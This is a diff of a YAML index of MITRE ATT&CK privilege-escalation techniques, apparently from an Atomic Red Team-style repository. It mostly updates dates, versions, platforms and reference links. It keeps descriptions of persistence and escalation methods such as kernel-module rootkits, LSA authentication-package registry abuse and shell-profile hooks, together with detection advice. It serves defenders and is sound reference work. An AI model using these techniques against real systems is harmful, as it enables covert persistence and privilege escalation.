-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: MacOS - Load Kernel Module via kextload and kmutil
@@ -23365,7 +23679,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -23391,12 +23705,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -23474,9 +23786,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -23543,7 +23854,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -23617,11 +23927,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -23638,7 +23947,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -23648,7 +23956,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -23657,19 +23965,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -23717,11 +24023,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -23789,23 +24096,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -23868,11 +24174,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -23925,8 +24230,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -23974,78 +24279,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -24093,6 +24331,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -24103,9 +24345,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -24114,8 +24360,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -24203,7 +24508,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -24228,13 +24533,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -24314,7 +24617,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -24350,7 +24652,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -24373,12 +24675,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -24456,12 +24757,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -24522,7 +24822,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -24566,7 +24865,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -24588,7 +24887,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests:
     - name: Add file to Local Library StartupItems
@@ -24821,7 +25119,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -24844,7 +25141,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -24874,12 +25171,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -24964,7 +25259,6 @@ privilege-escalation:
